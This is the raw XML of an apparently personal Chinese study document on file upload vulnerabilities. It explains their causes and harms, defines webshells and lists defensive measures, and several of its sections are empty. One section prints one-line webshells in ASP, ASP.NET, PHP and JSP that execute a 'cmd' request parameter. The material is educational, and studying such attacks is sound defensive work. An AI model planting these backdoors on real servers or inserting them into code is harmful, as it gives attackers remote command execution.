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81C0" w14:textId="188E624D" w:rsidR="005779EF" w:rsidRDefault="00187BF0" w:rsidP="00187BF0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00187BF0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3623DE31" w14:textId="211B833C" w:rsidR="00187BF0" w:rsidRPr="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187BF0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>什么是上传</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C5E923" w14:textId="7664DC78" w:rsidR="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187B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上传指用户提交文档到web服务器平台，是web系统中最常见的功能之一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25946733" w14:textId="0BF3C0BB" w:rsidR="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187B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文件上传功能本身没有问题，问题是文件被上传到哪里；上传之后，服务器如何处理、解释文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E3B6DA" w14:textId="500F7DCB" w:rsidR="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187BF0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>文件上传漏洞产生的原因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73215275" w14:textId="517E398D" w:rsidR="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00187BF0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传漏洞的成因，一方面服务器配置不当会导致任意文件上传</w:t>
      </w:r>
      <w:r w:rsidRPr="00187BF0">
        <w:t>;另一方面，Web 应用开放了文件上传功能，并且对上传的文件没有进行足够的限制;再者就是，程序开发部署时候，有考虑到系统特性和验证和过滤不严格而导致限制被绕过，上传任意文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5881C8D6" w14:textId="3DF20C9A" w:rsidR="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Web服务器的文件上传功能在程序设计上逻辑缺陷。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602A7BE" w14:textId="17336B59" w:rsidR="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Web服务器无法识别区分上传的文件内容、格式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F7B273" w14:textId="77777777" w:rsidR="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Web服务器对文件上传路径或位置控制不严格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351864A4" w14:textId="0E85CC0F" w:rsidR="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187B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服务器对所上传文件的读、写、执行、继承权限设计不严格。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7074C" w14:textId="652CBDBF" w:rsidR="00224F25" w:rsidRDefault="00224F25" w:rsidP="00224F25">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00224F25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>文件上传流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205D87DA" w14:textId="7F5025E8" w:rsidR="00224F25" w:rsidRPr="00224F25" w:rsidRDefault="00224F25" w:rsidP="00224F25">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40CB3EED" wp14:editId="776ACDB9">
            <wp:extent cx="5274310" cy="2911475"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="50175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2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4D45" w14:textId="77777777" w:rsidR="00B44480" w:rsidRDefault="00B44480" w:rsidP="00B44480"/>
    <w:p w14:paraId="076E161C" w14:textId="77777777" w:rsidR="00B44480" w:rsidRPr="00B44480" w:rsidRDefault="00B44480" w:rsidP="00B44480">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44480">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>文件上传漏洞的危害</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2552D33E" w14:textId="77777777" w:rsidR="00B44480" w:rsidRDefault="00B44480" w:rsidP="00B44480">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传漏洞最直接的威胁就是上传任意文件，包括恶意脚本、程序等。如果</w:t>
      </w:r>
      <w:r>
        <w:t>Web 服务器所保存上传文件的可写目录具有执行权限，那么就可以直接上传后门文件，导致网站沦陷。如果攻击者通过其他漏洞进行提权操作，拿到系统管理权限，那么直接导致服务器沦陷。同服务器下的其他网站无一幸免，均会被攻击者控制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757EA54C" w14:textId="745E10A2" w:rsidR="00B44480" w:rsidRDefault="00B44480" w:rsidP="00B44480">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过上传漏洞获得的网站后门，就是</w:t>
      </w:r>
      <w:r>
        <w:t>Webshell。上传漏洞与SQL注入或XSS相比，其风险更大，如果 Web应用程序存在上传漏洞，攻击者上传的文件是Web脚本语言，服务器的Web容器解释并执行了用户上传的脚本，导致代码执行。如果上传的文件是Flash的策略文件crossdomain.xml，黑客用以控制Fl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ash</w:t>
      </w:r>
      <w:r>
        <w:t>在该域下的行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47306B0F" w14:textId="06AA4C09" w:rsidR="00B44480" w:rsidRDefault="00B44480" w:rsidP="00334587">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果上传的文件是病毒、木马文件，黑客用以诱骗用户或者管理员下载执行。如果上传的文件是钓鱼图片或为包含了脚本的图片，在某些版本的浏览器中会被作为脚本执行，被用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>于钓鱼和欺诈甚至攻击者可以直接上传一个</w:t>
      </w:r>
      <w:r>
        <w:t>webshell到服务器上完全控制系统或致使系统瘫痪。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B957A79" w14:textId="77777777" w:rsidR="008E7639" w:rsidRDefault="008E7639" w:rsidP="008E7639">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C24A58E" w14:textId="2E0E746E" w:rsidR="008E7639" w:rsidRPr="008E7639" w:rsidRDefault="008E7639" w:rsidP="008E7639">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E7639">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>webshell概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F01FFC" w14:textId="2D408090" w:rsidR="008E7639" w:rsidRDefault="008E7639" w:rsidP="008E7639">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Webshell 就是以asp、php、jsp或者cgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（common</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gateway interface</w:t>
      </w:r>
      <w:r w:rsidR="00FE0A7A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用网关接口）</w:t>
      </w:r>
      <w:r>
        <w:t>等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B07F9DD" w14:textId="2F3EEF0D" w:rsidR="008E7639" w:rsidRDefault="00523C23" w:rsidP="008E7639">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>拆分开来看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="008E7639">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008E7639">
        <w:t>web”的含义显然是服务器开放的web服务，“shelI”的含义是取得对服务器某种程度上操作权限。在计算机科学中，Shell 俗称壳 (用来区别于“核”) ，是指“为使用者提供操作界面”的软件 (命令解释器)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16248EE8" w14:textId="3C3CC85A" w:rsidR="008E7639" w:rsidRPr="00187BF0" w:rsidRDefault="008E7639" w:rsidP="008E7639">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>webshell其大多是以动态脚本的形式出现，也有人称之为网站的后门工具，也是一个命令解释器，不过是以</w:t>
      </w:r>
      <w:r w:rsidR="00C611B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>eb 方式(HTTP 协议) 通信 (传递命令消息) ，继承了Web 用户的权限。WebShell本质上是在服务器端可运行的脚本文件，后缀名为.php/.asp/.aspx/</w:t>
      </w:r>
      <w:r w:rsidR="0056305B">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>jsp 等，也就是说WebShell 接收来自于Web 用户的命令，然后再服务器端执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B97B0E1" w14:textId="604A04D8" w:rsidR="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00187BF0">
        <w:t>webshell&amp;木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A863E95" w14:textId="75E91152" w:rsidR="00187BF0" w:rsidRDefault="0056305B" w:rsidP="00187BF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0056305B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A72CC1" w14:textId="4EA70C2E" w:rsidR="0056305B" w:rsidRDefault="0056305B" w:rsidP="00187BF0">
      <w:r w:rsidRPr="0056305B">
        <w:t>ASP:</w:t>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t>&lt;%eval request("cmd")%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B15C768" w14:textId="48E19EEC" w:rsidR="0056305B" w:rsidRDefault="0056305B" w:rsidP="00187BF0">
      <w:r w:rsidRPr="0056305B">
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidR="009B75DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t>NET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t>&lt;%@ Page Language="Jscript"%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5C1BAF" w14:textId="0539FD77" w:rsidR="0056305B" w:rsidRDefault="0056305B" w:rsidP="00187BF0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t>eval(Request.Item["cmd"],"unsafe");%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3BC460" w14:textId="77AEA69A" w:rsidR="0056305B" w:rsidRDefault="0056305B" w:rsidP="00187BF0">
      <w:r w:rsidRPr="0056305B">
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t>&lt;?php @eval(S_REQUEST[</w:t>
      </w:r>
      <w:r>
        <w:t>‘c</w:t>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t>md</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t>);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F9505D" w14:textId="734C9B5F" w:rsidR="0056305B" w:rsidRDefault="0056305B" w:rsidP="00187BF0">
      <w:r w:rsidRPr="0056305B">
        <w:t>JSP:</w:t>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0056305B">
        <w:t>% out.println(system(request.getParameter("cmd")));%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BD7C1B" w14:textId="4C7FC271" w:rsidR="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="0041014C">
        <w:t>WebShel防范</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D64B3FA" w14:textId="181F6330" w:rsidR="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041014C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>webshell防御</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6CC921" w14:textId="795BC294" w:rsidR="0041014C" w:rsidRPr="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="0041014C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于文件上传的防御，防住危险的脚本类型是最基本的防御，最理想的是能够过滤掉图片马中的恶意代码。如果一个</w:t>
      </w:r>
      <w:r w:rsidRPr="0041014C">
        <w:t>We</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="0041014C">
        <w:t xml:space="preserve"> 应用能够上传图片木马，那么我们认为这个Web 应用是不安全的。文件上传漏洞的防御主要从以下几个方面考虑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735200D7" w14:textId="77777777" w:rsidR="0041014C" w:rsidRPr="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014C">
      <w:r w:rsidRPr="0041014C">
        <w:t>*代码角度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E634FDD" w14:textId="629117FC" w:rsidR="0041014C" w:rsidRPr="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0041014C">
        <w:t>采用白名单策略，严格限制上传文件的后缀名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FBAC53" w14:textId="77777777" w:rsidR="0041014C" w:rsidRPr="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0041014C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行二次渲染，过滤掉图片马中的恶意代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="0041014C">
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0EBA39" w14:textId="77777777" w:rsidR="0041014C" w:rsidRPr="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0041014C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传文件重命名，尽量少的从客户端获取信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0B2740" w14:textId="77777777" w:rsidR="0041014C" w:rsidRPr="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0041014C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>避免文件包含漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D85C3C" w14:textId="77777777" w:rsidR="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0041014C">
        <w:t>严格处理文件路径，防御00.截断漏洞，避开空格、点、:SDATA等windows 特性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ED968C" w14:textId="5044AE1D" w:rsidR="0041014C" w:rsidRPr="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014C">
      <w:r w:rsidRPr="0041014C">
        <w:t>*服务器角度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB53999" w14:textId="77777777" w:rsidR="0041014C" w:rsidRPr="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0041014C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及时更新</w:t>
      </w:r>
      <w:r w:rsidRPr="0041014C">
        <w:t>WWeb 容器，防止解析漏洞的产生。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4579F4" w14:textId="3DA9110C" w:rsidR="0041014C" w:rsidRPr="0041014C" w:rsidRDefault="0041014C" w:rsidP="0041014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41014C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可写目录不给执行权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0DA6E6" w14:textId="77777777" w:rsidR="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>webshell工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300825A" w14:textId="77777777" w:rsidR="00187BF0" w:rsidRPr="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0"/>
    <w:p w14:paraId="080CEFF8" w14:textId="735EA9F9" w:rsidR="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传漏洞绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02429348" w14:textId="77777777" w:rsidR="00187BF0" w:rsidRPr="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0"/>
    <w:p w14:paraId="5FC8AECB" w14:textId="75959F4B" w:rsidR="00187BF0" w:rsidRPr="00187BF0" w:rsidRDefault="00187BF0" w:rsidP="00187BF0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传漏洞防范</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00187BF0" w:rsidRPr="00187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B350" w14:textId="77777777" w:rsidR="008A72E7" w:rsidRDefault="008A72E7" w:rsidP="0056305B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="59ECB080" w14:textId="77777777" w:rsidR="008A72E7" w:rsidRDefault="008A72E7" w:rsidP="0056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3F5F" w14:textId="77777777" w:rsidR="008A72E7" w:rsidRDefault="008A72E7" w:rsidP="0056305B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="312E693F" w14:textId="77777777" w:rsidR="008A72E7" w:rsidRDefault="008A72E7" w:rsidP="0056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AF5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62801C46"/>
    <w:lvl w:ilvl="0" w:tplc="DA487B7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E8F1C2C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EBB4D6FE"/>
    <w:lvl w:ilvl="0" w:tplc="8DDCACC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9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CFA21CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="503A1848"/>
    <w:lvl w:ilvl="0" w:tplc="DA487B7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5FF1003"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2F8232C"/>
    <w:lvl w:ilvl="0" w:tplc="8DDCACC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9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18529575">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="119347764">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1675843968">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="3287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66"/>
    <w:rsid w:val="00007BED"/>
    <w:rsid w:val="00187BF0"/>
    <w:rsid w:val="00224F25"/>
    <w:rsid w:val="00334587"/>
    <w:rsid w:val="00392C26"/>
    <w:rsid w:val="0041014C"/>
    <w:rsid w:val="00523C23"/>
    <w:rsid w:val="0056305B"/>
    <w:rsid w:val="005779EF"/>
    <w:rsid w:val="008A72E7"/>
    <w:rsid w:val="008E7639"/>
    <w:rsid w:val="009B75DC"/>
    <w:rsid w:val="00B44480"/>
    <w:rsid w:val="00B800C2"/>
    <w:rsid w:val="00C611B1"/>
    <w:rsid w:val="00CB360C"/>
    <w:rsid w:val="00E01866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58CE2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6F61FE2E-D83E-43AD-8DBD-FACA3210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B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B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3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30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3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E1CB8-6A16-4111-815F-7857C08F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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-27T02:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-02T13:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>